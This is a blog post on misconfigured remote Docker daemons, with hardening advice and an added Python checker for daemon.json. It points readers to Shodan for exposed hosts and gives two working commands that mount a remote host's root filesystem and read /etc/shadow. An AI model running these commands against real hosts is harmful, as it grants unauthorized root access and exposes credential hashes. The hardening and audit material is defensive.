Docker is awesome.
Also, it has a lot of security built in, allowing you to fully customize the level of access each container has to other containers or the host. Or you can just launch a container with root access to your entire host. But you would never do such a thing, right?
It all begins and ends with access to the Docker daemon: since it runs as root to do all the magical cgroup/namespace stuff, whoever can talk to it can control your host entirely.
By default, if you set up a host with https://get.docker.com, it’ll only listen on the unix socket /var/run/docker.sock, which is sufficient in most cases. If you use docker-machine to launch a host, it’ll enforce two-way TLS verification to strictly control access.
However, searching StackOverflow for help on accessing docker remotely will get you this:
If you check the official Docker docs, they’ll tell you to use TLS and enforce two-way verification, otherwise you’ll get pwned.
A quick search on Shodan for port 2375 (the default for non-TLS Docker) returns a good number of hosts to play with; searching for port 2376 (the default for TLS-enabled Docker) is also useful, although you will find some properly configured hosts there.
Let’s pop a box. © @ReL1K
# For non-TLS hosts: the daemon accepts any client that can reach the port
docker -H docker.host.no.tls:2375 run --rm -v /:/pwn busybox cat /pwn/etc/shadow
# For TLS-enabled hosts started without --tlsverify: the daemon encrypts the
# connection but never asks the client for a certificate
docker -H docker.host.no.tlsverify:2376 --tls run --rm -it -v /:/pwn busybox cat /pwn/etc/shadow
The snippet above launches a busybox container with the host’s root filesystem bind-mounted at /pwn and cats /etc/shadow as a PoC that you have root access to the host’s filesystem. At this point I’ll leave the next steps to your imagination :)
How to Docker responsibly?
Use proper certificates and don’t forget the --tlsverify flag on the daemon (together with --tlscacert, --tlscert and --tlskey) to force two-way TLS authentication. --tls alone only encrypts the connection and still lets any client in, and if you don’t need remote access at all, leave the daemon on the unix socket.
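As an added example (not part of the original post), here is a small Python check that reads a dockerd daemon.json and reports a TCP listener that lacks two-way TLS. The key names (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are the real daemon.json options; the three sample configs are constructed for illustration.

```python
"""Audit a dockerd daemon.json for a TCP listener without two-way TLS."""
import json
import sys

# Constructed sample configs: the weak setting, a half-fixed one, and the fix.
WEAK_CONFIG = json.loads("""
{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
""")
TLS_NO_VERIFY_CONFIG = json.loads("""
{"hosts": ["tcp://0.0.0.0:2376"], "tls": true,
 "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}
""")
HARDENED_CONFIG = json.loads("""
{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
 "tlsverify": true, "tlscacert": "/etc/docker/ca.pem",
 "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}
""")


def audit_daemon_config(config: dict) -> list:
    """Return findings for the given daemon.json dict; empty list means OK."""
    findings = []
    tcp_hosts = [h for h in config.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix socket only: nothing reachable over the network
    if not (config.get("tls") or config.get("tlsverify")):
        findings.append("TCP listener %s without TLS: anyone who can reach the "
                        "port is root on the host" % tcp_hosts)
        return findings
    if not config.get("tlsverify"):
        findings.append("tls set but tlsverify missing: the connection is "
                        "encrypted but any client is accepted")
    # tlsverify needs the CA to check clients and a server cert/key to present
    for key in ("tlscacert", "tlscert", "tlskey"):
        if not config.get(key):
            findings.append("%s not set: two-way TLS cannot work without it" % key)
    return findings


def audit_file(path: str) -> list:
    """Load a daemon.json from disk (default location /etc/docker/daemon.json)."""
    with open(path) as fh:
        return audit_daemon_config(json.load(fh))


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/docker/daemon.json"
    for finding in audit_file(path) or ["OK: no exposed TCP listener"]:
        print(finding)
```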